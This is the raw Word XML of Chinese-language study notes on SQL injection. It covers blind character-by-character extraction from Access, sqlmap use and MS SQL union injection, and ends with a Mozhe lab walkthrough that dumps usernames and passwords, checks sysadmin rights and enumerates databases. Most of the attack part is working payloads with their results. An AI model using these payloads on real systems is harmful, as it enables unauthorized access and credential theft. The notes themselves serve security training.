      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700D4719" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>猜测</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>完表名</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>和字段名后，我们就看看这个表里面有多少行数据 ，如果&gt;99查询正确，&gt;100查询错误(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7C79E5"/>
        </w:rPr>
        <w:t>这里是查询错误，而不是语法错误</w:t>
      </w:r>
      <w:r>
        <w:t>)，说明有100行数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486D6E1C" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>and (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">*) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> information)&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292614E5" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>然后在猜测每个字段具体的数据了 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FC5E2C" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>access数据库中没有 limit，就不能限制查询出来的行数。但是我们可以使用top命令，top 1是将查询的所有数据只</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>显示第</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>一行，所以 top3就是显示查询出来的前三行数据了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B594AD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猜测admin列的第一个数据的长度，如果大于5查询不出数据，大于4正常，说明admin列的第一个数据长度是5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611590C1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and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len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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)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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135F2923" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B9E235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猜测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>列的第一行数据的第一个字符的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>ascii</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>码值，如果大于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>查询不出数据，大于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>96</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>正常，说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>列的第一行数据的第一个字符的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>ascii</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>值是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>97</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A27D177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>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>))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97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549B7D46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第一行数据的第二个字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C21C55D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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>))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97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669D5FF1" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E7694C4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从第二行开始，查询数据就得用另外的语句了,因为这里的top只能显示查询前几条数据，所以我们得用联合查询，先查询前两条，然后倒序，然后在找出第一条，这就是第二条数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6635F27A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查询第二行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>列的长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA412E7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lastRenderedPageBreak/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len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">)  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( 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2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377606EE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下面是查询第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>条数据的第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>个字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F4983A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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">))  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( 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2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5380B2A6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查询第三条数据的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>个字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B527262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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">))  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( 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3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34173202" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRP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2363D1" w14:textId="410E128C" w:rsidR="009B36FD" w:rsidRDefault="009B36FD" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>注入Access数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EA4FC9" w14:textId="128B5FB8" w:rsidR="00C51675" w:rsidRPr="00C51675" w:rsidRDefault="00C51675" w:rsidP="00C51675">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>system_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,@@version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B93AAA" w14:textId="77777777" w:rsidR="009B36FD" w:rsidRDefault="009B36FD" w:rsidP="009B36FD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:color w:val="7C79E5"/>
        </w:rPr>
        <w:t>爆出access数据库存在的表</w:t>
      </w:r>
      <w:r>
        <w:t>，只能利用枚举的方式爆破。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020C81C6" w14:textId="77777777" w:rsidR="009B36FD" w:rsidRDefault="009B36FD" w:rsidP="009B36FD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>"xxx</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">  --</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DB3FA1" w14:textId="77777777" w:rsidR="009B36FD" w:rsidRPr="009B36FD" w:rsidRDefault="009B36FD" w:rsidP="009B36FD"/>
    <w:p w14:paraId="5A24CDE5" w14:textId="77777777" w:rsidR="003C3D8B" w:rsidRDefault="00622ABA" w:rsidP="00CA2DA4">
      <w:pPr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字符型注入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FBA2D5" w14:textId="77777777" w:rsidR="00622ABA" w:rsidRDefault="00622ABA" w:rsidP="00CA2DA4">
      <w:r>
        <w:t>在数据库中一般语句类似于：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">select *或字段 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>menber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> like ‘%字符或字段%’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A29AA5" w14:textId="77777777" w:rsidR="00622ABA" w:rsidRDefault="00622ABA" w:rsidP="00CA2DA4"/>
    <w:p w14:paraId="5913A0E7" w14:textId="77777777" w:rsidR="00622ABA" w:rsidRDefault="00622ABA" w:rsidP="00CA2DA4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入语句%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or 1=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6110AC83" w14:textId="77777777" w:rsidR="00622ABA" w:rsidRDefault="00622ABA" w:rsidP="00CA2DA4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or 1=1</w:t>
      </w:r>
      <w:r w:rsidR="00850C93">
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B6FB53" w14:textId="77777777" w:rsidR="00850C93" w:rsidRDefault="00850C93" w:rsidP="00CA2DA4"/>
    <w:p w14:paraId="21D481E9" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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=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server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70888A8E" w14:textId="77777777"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Order by 4  判断字段数  --------字段数为4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41384B4B" w14:textId="77777777"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（注意：此处我测试两次，第一次可以正常显示，第二次未正常测出字段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数此时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可以用如下语法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正常--------字段数为四）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'2','3','4'      查看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显示位--------显</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7A6B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>示位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为2和3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schemat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 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数据库名称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table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schem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'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表名  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'),1)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字段     三个：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id  username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  password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AD50B1" w14:textId="77777777" w:rsidR="00A14128" w:rsidRPr="006F7A6B" w:rsidRDefault="00A14128" w:rsidP="00A14128"/>
    <w:p w14:paraId="3EFD64FA" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">id=2 and 1=2 union all select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1,(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">select top 1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>col_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>object_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('manage'),</w:t>
      </w:r>
      <w:r w:rsidRPr="00E605F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sysobjects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>), '3',4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A179A06" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆出三个表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167C8B6F" w14:textId="77777777" w:rsidR="00A14128" w:rsidRPr="00E605F2" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E605F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Id    username    password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FDDE17" w14:textId="62C9FE8D" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:t>?id=-2 union all select '1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>',username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,password,'4' from manage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A375A9C" w14:textId="77777777" w:rsidR="00D53C32" w:rsidRDefault="00D53C32" w:rsidP="00A14128"/>
    <w:p w14:paraId="203DFE1C" w14:textId="260C0450" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128"/>
    <w:p w14:paraId="360E33E6" w14:textId="797BE0DC" w:rsidR="00D53C32" w:rsidRDefault="00D53C32" w:rsidP="00C51675">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>墨者案例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206E4C10" w14:textId="65747EC9" w:rsidR="00E13132" w:rsidRPr="00E13132" w:rsidRDefault="00E13132" w:rsidP="00E13132">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>普通注入方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E90BED" w14:textId="2AC6C1F8" w:rsidR="00D53C32" w:rsidRPr="00D53C32" w:rsidRDefault="00D53C32" w:rsidP="00D53C3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order by 2 成功；order by 3 失败； order by 4 成功；order by 5 失败 说明列数位于 3-4之间。查找回显点</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53C32">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w: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0234B" wp14:editId="4296B5BC">
            <wp:extent cx="5274310" cy="25755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4111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id=2 and 1=2 union all select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null,null,null,null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；挨个替换null 发现 select null,2,null,null 页面出现回显。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627BE4F7" w14:textId="5B89D4EF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26DBF3" wp14:editId="76D16E85">
            <wp:extent cx="5274310" cy="2570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D5FC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查找所在库名称添加： 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select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)), '3', 4 找到数据库名称。 提示：这里也可以使用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1)、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2)等查询其他数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1D00DC" w14:textId="17F2343E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D0BBBE" wp14:editId="6D169F82">
            <wp:extent cx="5274310" cy="26835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C95F" w14:textId="77777777" w:rsidR="00D53C32" w:rsidRPr="00D53C32" w:rsidRDefault="00D53C32" w:rsidP="00D53C3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查找数据库表名称：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select top 1 name from mozhe_db_v2.dbo.sysobjects where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 = 'U'),'3',4 提示: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='U' 为 用户表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5805FF" w14:textId="545765D9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BF1FEC" wp14:editId="00583E37">
            <wp:extent cx="5274310" cy="2447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E23A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select top 1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('manage'),1) from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),'3',4 替换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'manage'),1) 中的1 依次为 2，3，4查出所有列名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F595B4" w14:textId="79A51646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38678C" wp14:editId="03EEC26A">
            <wp:extent cx="5274310" cy="27038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CA92" w14:textId="6DF32B01" w:rsid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查取数据: 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>select top 1 username from manage),'3',4 获取用户名；?id=2 and 1=2 union all select 1,(select top 1 password from manage),'3',4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C5C4F8" w14:textId="52221E75" w:rsidR="00C51675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F74979" w14:textId="7C0BE6FF" w:rsidR="00C51675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A9D193" w14:textId="60D9E7DD" w:rsidR="00E13132" w:rsidRDefault="00E131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A1060B" w14:textId="16719809" w:rsidR="00E13132" w:rsidRDefault="00E131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E2420D" w14:textId="4EA21A87" w:rsidR="00E13132" w:rsidRDefault="00E13132" w:rsidP="00E13132">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>特殊注入方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE3C95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表明返回为空</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4FAF436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5305/new_list.asp?id=2 and 1=0 union all select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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,'text',null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11B8ABFE" w14:textId="6BC168E4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5A26E" wp14:editId="0D896A58">
            <wp:extent cx="8890" cy="88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552F46" wp14:editId="2C4FFDD9">
            <wp:extent cx="5274310" cy="17754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FB3F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5305/new_list.asp?id=2 and 1=0 union all select 1,'title','context',2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E75A721" w14:textId="7B8C8B54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037E0C" wp14:editId="6088CF7B">
            <wp:extent cx="8890" cy="88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078899" wp14:editId="20C6DBD7">
            <wp:extent cx="5274310" cy="13595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97F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1250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,@@version,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3966FB87" w14:textId="1CF929BC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102156" wp14:editId="23EB8279">
            <wp:extent cx="8890" cy="88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DBAC38" wp14:editId="424F8F17">
            <wp:extent cx="5274310" cy="18211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310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http://219.153.49.228:41250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,db_name(),2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A80A75D" w14:textId="0B786BD3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6AC13B" wp14:editId="634C918B">
            <wp:extent cx="8890" cy="88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83A297" wp14:editId="2820D1C8">
            <wp:extent cx="5274310" cy="12357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76D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所以获取到当前数据库为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715A2BE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ozhe_db_v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B53A73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当前用户为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4342E8E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ozhe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78ED024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数据库版本是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377CAE3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icrosoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453440C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5）测试权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A6197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1250/new_list.asp?id=2/is_srvrolemember('sysadmin')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2BB7C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返回正常，说明用户属于sysadmin组，即有sysadmin权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B364D6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/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7D44FE7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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE36AC8" w14:textId="487893EC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015080" wp14:editId="1232F89F">
            <wp:extent cx="8890" cy="88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7A0995" wp14:editId="26D9010D">
            <wp:extent cx="4184015" cy="1043940"/>
            <wp:effectExtent l="0" t="0" r="698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A3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http://219.153.49.228:49135/new_list.asp?id=2/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ozh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2D84D3FB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返回正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC5174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6）加号的使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331AE97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%2B是+的编码，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中不能直接使用，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否则会别解析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为空格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7C536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9135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@@version,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E994F7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翻译成为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8A846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9135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+'|'+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(),@@version,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F05A30F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把（5）中的两个改成+的模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664D28C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%2B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39231CB6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%2B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ozh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13113C9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1%2B1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174E8231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7）枚举出所有数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E545A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name,2 from master..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databas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2BADE5D2" w14:textId="3A38B72F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CE4CC1" wp14:editId="3A03AE0B">
            <wp:extent cx="8890" cy="8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6367BA" wp14:editId="5367C6ED">
            <wp:extent cx="5274310" cy="12782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6E1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name,2 from master..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databas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 where name not in('master')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C99F01" w14:textId="18B65EF9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8F00D1" wp14:editId="730EC55C">
            <wp:extent cx="8890" cy="88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1F3F3F" wp14:editId="0809F150">
            <wp:extent cx="5274310" cy="1257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A38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按照上面方法，直到报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBE8A4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name,2 from master..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databas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 where name not in('master','model','mozhe_db_v2','msdb','tempdb')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CB3CF4" w14:textId="5570EB31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A2E40" wp14:editId="731DB335">
